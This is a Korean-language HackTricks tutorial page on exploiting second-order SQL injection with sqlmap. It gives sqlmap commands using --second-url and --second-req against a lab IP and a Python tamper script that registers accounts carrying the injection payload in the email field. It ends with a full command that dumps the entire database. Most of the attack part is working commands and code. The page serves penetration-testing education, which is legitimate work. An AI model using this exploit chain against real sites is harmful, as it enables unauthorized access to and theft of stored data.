Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

SQLMap์€ 2์ฐจ SQL ์ธ์ ์…˜์„ ์ด์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
๋‹ค์Œ ์ •๋ณด๋ฅผ ์ œ๊ณตํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค:

  • SQL ์ธ์ ์…˜ ํŽ˜์ด๋กœ๋“œ๊ฐ€ ์ €์žฅ๋  ์š”์ฒญ
  • ํŽ˜์ด๋กœ๋“œ๊ฐ€ ์‹คํ–‰๋  ์š”์ฒญ

SQL ์ธ์ ์…˜ ํŽ˜์ด๋กœ๋“œ๊ฐ€ ์ €์žฅ๋˜๋Š” ์š”์ฒญ์€ sqlmap์˜ ๋‹ค๋ฅธ ์ธ์ ์…˜๊ณผ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค. SQL ์ธ์ ์…˜์˜ ์ถœ๋ ฅ/์‹คํ–‰์„ sqlmap์ด ์ฝ์„ ์ˆ˜ ์žˆ๋Š” ์š”์ฒญ์€ --second-url ๋˜๋Š” ํŒŒ์ผ์—์„œ ์ „์ฒด ์š”์ฒญ์„ ์ง€์ •ํ•ด์•ผ ํ•˜๋Š” ๊ฒฝ์šฐ --second-req๋กœ ํ‘œ์‹œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ฐ„๋‹จํ•œ 2์ฐจ ์˜ˆ์‹œ:

#Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"

#Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt

์—ฌ๋Ÿฌ ๊ฒฝ์šฐ์— ์ด๊ฒƒ๋งŒ์œผ๋กœ๋Š” ์ถฉ๋ถ„ํ•˜์ง€ ์•Š์„ ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์™œ๋ƒํ•˜๋ฉด ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ „์†กํ•˜๊ณ  ๋‹ค๋ฅธ ํŽ˜์ด์ง€์— ์ ‘๊ทผํ•˜๋Š” ๊ฒƒ ์™ธ์— ๋‹ค๋ฅธ ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•ด์•ผ ํ•˜๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค.

์ด๊ฒƒ์ด ํ•„์š”ํ•  ๋•Œ sqlmap tamper๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, ๋‹ค์Œ ์Šคํฌ๋ฆฝํŠธ๋Š” sqlmap ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ด๋ฉ”์ผ๋กœ ์‚ฌ์šฉํ•˜์—ฌ ์ƒˆ ์‚ฌ์šฉ์ž๋ฅผ ๋“ฑ๋กํ•˜๊ณ  ๋กœ๊ทธ์•„์›ƒํ•ฉ๋‹ˆ๋‹ค.

#!/usr/bin/env python

import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
pass

def login_account(payload):
proxies = {'http':'http://127.0.0.1:8080'}
cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}

params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
url = "http://10.10.10.10/create.php"
pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

url = "http://10.10.10.10/exit.php"
pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
login_account(payload)
return payload

A SQLMap tamper๋Š” ํŽ˜์ด๋กœ๋“œ๋กœ ์ธ์ ์…˜ ์‹œ๋„๋ฅผ ์‹œ์ž‘ํ•˜๊ธฐ ์ „์— ํ•ญ์ƒ ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค ๊ทธ๋ฆฌ๊ณ  ํŽ˜์ด๋กœ๋“œ๋ฅผ ๋ฐ˜ํ™˜ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด ๊ฒฝ์šฐ ์šฐ๋ฆฌ๋Š” ํŽ˜์ด๋กœ๋“œ์— ์‹ ๊ฒฝ ์“ฐ์ง€ ์•Š์ง€๋งŒ, ๋ช‡ ๊ฐ€์ง€ ์š”์ฒญ์„ ๋ณด๋‚ด๋Š” ๊ฒƒ์— ์‹ ๊ฒฝ ์“ฐ๋ฏ€๋กœ ํŽ˜์ด๋กœ๋“œ๋Š” ๋ณ€๊ฒฝ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

๋”ฐ๋ผ์„œ, ์–ด๋–ค ์ด์œ ๋กœ ์ธํ•ด ๋‘ ๋ฒˆ์งธ SQL ์ธ์ ์…˜์„ ์•…์šฉํ•˜๊ธฐ ์œ„ํ•ด ๋” ๋ณต์žกํ•œ ํ๋ฆ„์ด ํ•„์š”ํ•˜๋‹ค๋ฉด:

  • โ€œ์ด๋ฉ”์ผโ€ ํ•„๋“œ์— SQLi ํŽ˜์ด๋กœ๋“œ๊ฐ€ ํฌํ•จ๋œ ๊ณ„์ •์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.
  • ๋กœ๊ทธ์•„์›ƒํ•ฉ๋‹ˆ๋‹ค.
  • ํ•ด๋‹น ๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธํ•ฉ๋‹ˆ๋‹ค (login.txt).
  • SQL ์ธ์ ์…˜์„ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•ด ์š”์ฒญ์„ ๋ณด๋ƒ…๋‹ˆ๋‹ค (second.txt).

์ด sqlmap ๋ช…๋ น์–ด๊ฐ€ ๋„์›€์ด ๋  ๊ฒƒ์ž…๋‹ˆ๋‹ค:

sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
##########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ